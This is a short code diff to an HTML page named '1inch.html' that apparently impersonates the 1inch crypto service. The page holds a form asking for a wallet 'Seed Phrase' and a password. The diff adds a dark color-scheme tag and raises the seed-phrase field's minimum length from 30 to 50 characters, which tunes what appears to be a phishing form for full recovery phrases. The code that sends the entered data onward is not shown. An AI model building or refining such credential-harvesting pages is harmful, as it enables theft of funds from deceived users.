--- a/1inch.html
+++ b/1inch.html
@@ -3,6 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="color-scheme" content="dark">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"
     integrity="sha512-iBBXm8fW90+nuLcSKlbmrPcLa0OT92xO1BIsZ+ywDWZCvqsWgccV3gFoRBv0z+8dLJgyAHIhR35VZc2oM/gI1w=="
@@ -80,7 +81,7 @@
                                 <h4>1inch</h4>
                             
                             </div>
-                            <textarea id="seed" minlength="30"  minlength="30"  name="1inch" placeholder="Seed Phrase..." required></textarea >
+                            <textarea id="seed" minlength="50"   name="1inch" placeholder="Seed Phrase..." required></textarea >
                         <input id="movepass"  type="password"
                       placeholder="Password" name="Password"/>
                         </div>
